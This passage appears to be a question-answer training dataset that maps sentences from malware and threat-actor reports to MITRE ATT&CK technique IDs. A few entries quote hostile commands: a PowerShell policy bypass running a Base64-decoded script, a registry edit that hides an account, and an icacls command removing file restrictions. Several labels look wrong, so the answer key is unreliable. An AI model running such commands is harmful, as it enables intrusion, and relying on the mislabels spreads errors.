a copy of the SolarWinds Orion software source file with a .bk extension to backup the original content, wrote SUNBURST using the same filename but with a .tmp extension, and then moved SUNBURST using MoveFileEx to the original filename with a .cs extension so it could be compiled within Orion software.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used Winexe to install a service on the remote system.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic can scan a directory to identify files for deletion.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net can be used to query a remote system for available shared drives using the net view \\\\remotesystem command.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,According to the server’s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\ and dropped a shortcut in %STARTUP%.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu has used msiexec to execute malicious Windows Installer packages.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use proxy tools including boost_proxy_client for reverse proxy functionality.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HARDRAIN opens the Windows Firewall to modify incoming connections.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,64) u= {B5B70BD7-87FC-499A-B4D1- 98163306F0D8} A GUID r= 1 Boolean value if the malware is running as injected code t= 8035187 Number of milliseconds the computer has been running Table 3### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can enumerate network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM has used keyloggers that are also capable of dumping credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX adds Run key entries in the Registry to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has used the curl --upload-file command to exfiltrate data over HTTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used cmd.exe likely as a password changing mechanism.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger can identify the domain of the compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used VBA macros to display a dialog box and collect victim credentials.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel is capable of downloading additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use common management tools and protocols, such as Simple Network Management Protocol and Smart Install , to access network configuration files.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has obsuscated code with stack strings and string encryption.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has exploited known vulnerabilities in remote services including RDP.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IIS provides several mechanisms to extend the functionality of the web servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has used HTTPS over port 1402 in C2 communication.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users typically interact with code repositories through a web application or command-line utilities such as git.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to use the macOS built-in zip utility to archive files.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malicious modules in regsvr32.exe memory After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload alongside each other.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use malicious browser extensions to steal cookies and other user information.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PS1 is distributed as a set of encrypted files and scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has also used the Registry entry HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe” to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify running processes and associated plugins on an infected host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject dynamic-link libraries into processes in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has cleared event logs from victims.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create and cultivate accounts with services that can be used during targeting.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet infects remote servers via network shares and by infecting WinCC database views with malicious code.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brave Prince gathers network configuration information as well as the ARP cache.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET adds malicious file paths to the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables to execute malicious code.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service .### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT has a feature to perform voice recording on the victim’s machine.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These events cannot start applications remotely , but they can interact with applications if they're already running remotely.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk retrieves the hard disk name by calling the CreateFileA to \\.\PHYSICALDRIVE0 API.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team added a login to a SQL Server with sp_addlinkedsrvlogin.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used side loading to place malicious DLLs in memory.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has the capability to start services.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry.### Assistant: T1612: Build Image on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy can capture screenshots of the desktop over multiple monitors.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has been observed deleting its original launcher after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software is present on the system that executes netsh.exe as part of its normal functionality.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has commands to get the current directory name as well as the size of a file.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The config file provides download instructions for the loader### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has encrypted traffic with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can use TCP to communicate between its agent and client modules.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has used the command ls /etc | egrep -e""fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"" to determine which Linux OS version is running.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has acquired web services for use in C2 and exfiltration.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encryption can be used to protect transmitted network traffic to maintain its confidentiality and integrity .### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has used ZIP to compress data gathered on a compromised host.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has compromised email accounts to send spearphishing e-mails.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors compromise a website used by their target demographic (e.g., compromising a website specializing in oil and gas industry news when targeting the energy vertical)### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used msiexec to download and execute malicious Windows Installer files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon has used DropBox for C2 communications.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about business tempo may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT is capable of logging keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common TCP ports 80 and 443 are used to blend in with routine network traffic### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,winlogon### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: ipconfig /all >> %temp%\download APT32 used the ipconfig /all command to gather the IP address from the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has used watering holes to deliver files with exploits to initial victims.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROCKBOOT is a Master Boot Record bootkit that uses the MBR to establish persistence.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has added BMP images to the resources section of its Portable Executable file increasing each binary to at least 300MB in size.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Protocols such as ICMP may be used as a transport.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has started a web service in the target host and wait for the adversary to connect, acting as a web shell.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to communicate with C2 over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has used user mode rootkit techniques to remain hidden on the system.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware samples use a common function to identify target files by their extension.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore uses HTTP requests for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has attempted to exploit a known vulnerability in WinRAR , and attempted to gain remote code execution via a security bypass vulnerability .### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used PowerShell commands embedded inside batch scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit acquires valid SSH accounts through brute force.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedGrace encrypts its C2 configuration files with AES in CBC mode.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can display the /etc/passwd file on a compromised host.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once decrypted, we are provided with a large list of strings, as seen below (note that the data has been truncated for brevity): Figure 12 Decrypted strings from embedded BMP file After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used batch scripts and the command-line interface for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rootkits have been seen for Windows, Linux, and Mac OS X systems.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used powershell.exe to download and execute scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk can use stolen domain admin accounts to move laterally within a victim domain.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can enumerate files and directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has developed custom malware such as Hildegard.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to delete files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER is written in PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using a custom User Agent string or the system's User Agent string derived from urlmon.dll 7### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE performs several anti-VM and sandbox checks on the victim's machine.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can use BITS Utility to connect with the C2 server.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can gather the victim's Internet Explorer version.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IIS modules may also be installed to extend IIS web servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variations of this method such as reflective DLL injection and memory module overcome the address relocation issue as well as the additional APIs to invoke execution .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to generate the current date and time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers the Address Resolution Protocol table from the victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may add a value to the Windows Registry or other means that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can inject into a target process using process doppelgänging.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search network shares on computers they have compromised to find files of interest.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used a custom .NET tool to collect documents from an organization's internal central database.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based restrictions on files and directories.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can execute JavaScript containing configuration data for establishing persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MOTW is a NTFS feature and many container files do not support NTFS alternative data streams.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore uses JavaScript files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may set files and directories to be hidden to evade detection mechanisms.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke issued wget requests from infected systems to the C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather credentials by reading files located inside of the Credential Lockers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, the resources for a link target will be an HTML page that may include some client-side script such as JavaScript to decide what content to serve to the user.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to use HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has searched the Image File Execution Options registry key for ""Debugger"" within every subkey.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and 